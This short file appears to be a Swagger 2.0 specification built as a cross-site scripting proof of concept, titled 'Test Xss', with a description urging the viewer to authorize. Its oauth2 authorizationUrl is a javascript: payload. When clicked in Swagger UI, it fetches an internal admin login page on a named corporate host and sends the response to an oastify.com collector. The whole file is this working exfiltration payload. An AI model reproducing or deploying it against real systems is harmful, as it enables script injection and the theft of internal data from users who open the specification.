swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:fetch('https://mymessage-corp.apple.com/mmservices/admin/login').then(a=> a.text()).then(a=> fetch('https://0opz7ocez74upehubhydrq13ouuki9.oastify.com?x='+a))//
info:
  version: "0.0.1"
  title: Test Xss
  description: Please Autorize!
paths:
  /:
    get:
      responses:
        200:
          description: Successful respons
